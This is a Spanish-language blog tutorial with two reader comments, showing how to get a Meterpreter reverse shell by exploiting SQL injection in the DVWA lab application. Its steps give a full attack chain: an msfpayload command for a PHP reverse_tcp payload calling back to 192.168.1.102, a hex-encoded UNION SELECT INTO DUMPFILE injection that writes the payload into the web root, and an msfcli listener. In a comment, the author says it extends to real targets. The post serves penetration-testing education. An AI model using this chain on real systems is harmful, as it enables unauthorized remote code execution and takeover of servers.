30 abr 2012

Obtener una sesión meterpreter explotando SQL Injection

Hoy vamos a ver como obtener una sesión de Meteperter explotando una vulnerabilidad SQL Injectión, para recrear este ejemplo vamos a utilizar DVWA.

1. Creamos el payload:

msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=10000 R > payload.php

2. Ahora este código lo tenemos que pasar la Hexadecimal. Para ello podéis emplear los multiples aplcaciones online que hay. Yo dejo las 2 que suelo usar:

http://ostermiller.org/calc/encode.html
http://www.seguridadwireless.net/php/conversor-universal-wireless.php

3. El codigo quedaría algo así:

233c3f7068700a0a6572726f725f7265706f7274696e672830...

4. Inyectamos el siguiente comando en la aplicación web:
' union select '',0x233c3f7068700a0a6572726f725f7265706f7274696e672830... into dumpfile '/opt/lampp/htdocs/uploads/payload.php'#

5. Nos quedamos escuchando para cuando se ejecuta el payload.

msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=10000 E

5. Ahora si nos vamos al sitio el cual hemos subido el payload (/opt/lampp/htdocs/uploads/) y lo ejecutamos tendríamos que obtener la sesión Meterpreter.

6. Si volvemos a la pantalla donde hemos dejado escuchando vemos que tenemos una sesión Meterpreter.

Contenido completo en Red Orbita

Suscríbete a nuestro Boletín

2 comentarios:

  1. Hola, muchas gracias por el material.
    Se me ha generado una duda, quizás me la puedan responder antes de realizar el laboratorio...
    ¿Esto funciona solo local?

    ResponderBorrar
  2. Carlos,

    La demo fue hecha en forma local pero sirve para ampliarlo a un escenario real en donde haya una posibilidad de inyectar SQL.

    Cristian

    ResponderBorrar

Gracias por dejar un comentario en Segu-Info.

Gracias por comentar!